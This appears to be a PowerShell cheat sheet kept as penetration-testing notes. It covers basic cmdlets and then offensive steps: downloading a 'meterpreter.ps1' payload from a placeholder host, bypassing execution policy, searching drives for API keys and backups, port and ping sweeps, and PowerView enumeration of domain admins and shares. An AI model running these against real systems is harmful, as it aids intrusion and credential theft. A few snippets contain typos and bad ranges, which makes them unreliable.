# Powershell Usage ## Get-Help ``` Get-Help Command-Name ``` * Show examples ``` Get-Help Command-Name -Examples ``` * Get-Command gets all the cmdlets installed on the current Computer. ``` Get-Command ``` ``` Get-Command Verb-* Get-Command Invoke-* Get-Command Get-* ``` ## Passing Output via Pipe * A pipe passes object including methods and attributes. ``` Verb-Noun | Get-Member ``` ``` Get-Command | Get-Member -MemberType Method ``` ## Creating Objects from Previous Cmdlets ``` Get-ChildItem | Select-Object -Property Mode, Name ``` * first - gets the first x object * last - gets the last x object * unique - shows the unique objects * skip - skips x objects ## Filtering Objects ``` Verb-Noun | Where-Object -Property PropertyName -operator Value Verb-Noun | Where-Object {$_.PropertyName -operator Value} ``` The second version uses the $_ operator to iterate through every object passed to the Where-Object cmdlet. * Where -operator is a list of the following operators: * -Contains: if any item in the property value is an exact match for the specified value * -EQ: if the property value is the same as the specified value * -GT: if the property value is greater than the specified value ## Sort Object ``` Verb-Noun | Sort-Object ``` ``` Get-ChildItem | Sort-Object ``` ## Finding a File ``` Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'} ``` ```sh Get-HotFix | Format-list | findstr ``` ## Showing File Content ``` Get-Content 'C:\Program Files\interesting-file.txt' ``` ## Copy File Content ```sh Copy-Item ``` ## Count Lines of Output As an example, count all cmdlets on the system ``` Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object ``` ## Checksum of File ``` Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt' ``` ## Current Working Directory ``` Get-Location ``` ## File Metadata ```sh ls | Format-List * ``` ## Web Request ```sh Invoke-Webrequest -Uri 'http:// -OutFile ``` ```sh (New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1') ``` ## Base64 Decode File ``` [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt))) ``` ## **Circumvent Execution-Policy** ```sh powershell -ExecutionPolicy Bypass -File .\ ``` ```sh Set-ExecutionPolicy Bypass -Scope Process ``` ## Enumeration ### Users ``` Get-LocalUser ``` * Password not required users ``` Get-LocalUser | Where-Object -Property PasswordRequired -Match false ``` * SID of users ``` Get-WmiObject win32_useraccount | Select name, sid ``` ### Network intel * IP Address ``` Get-NetIpAddress ``` * Listening TCP Ports ``` Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure ``` * TCP Port by number ``` Get-NetTCPConnection | Where-Object -Property LocalPort -Match 443 ``` ### Patch level and updates ``` Get-Hotfix ``` * Find patch by HotFixID ``` Get-Hotfix | Where-Object -Property HotFixID -Match KB124284 ``` ### Find files and Content * Find backup files ``` Get-ChildItem -Path C:\ -Recurse -Include *.bak* -ErroAction SilentlyContinue ``` * Find file contents ``` Get-ChildItem -Path C:\* -Recurse | Select-String -pattern API_KEY ``` ### Processes * Start processes ```sh Start-Process ``` * Running processes ```sh Get-Process ``` * Scheduled Tasks, by TaskName ``` Get-ScheduledTask | Where-Object -Property TaskName -Match taskname ``` or ``` Get-ScheduledTask -TaskName taskname ``` ### Export Output * Export as CSV ```sh Get-Process | Export-Csv ``` ### ACL * Owner of files ``` Get-ACL C:\ ``` ### Port Scanner ``` for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i} ``` ### Ping Hosts ```sh 1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl} ``` ### Using Powerview ```sh Import-Module .\powerview.ps1 Get-NetDomainController (Get-NetUser).name Get-NetUser -properties description Get-NetUser | select -ExpandProperty lastlogon Get-NetComputer -ping Get-NetGroupMember "Domain Admins" Find-DomainShare -CheckShareAccess ``` * Enumerate Group Policy ```sh Get-NetGPO ``` * Trust relationship to other domains ```sh Get-NetDomainTrust ``` * User enumeration ```sh Find-LocalAdminAccess ```